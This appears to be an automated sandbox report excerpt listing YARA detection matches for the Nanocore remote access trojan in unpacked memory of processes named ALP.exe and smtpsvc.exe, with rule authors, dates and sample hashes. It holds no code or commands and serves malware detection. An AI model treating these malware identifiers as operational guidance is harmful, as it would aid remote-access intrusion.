        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
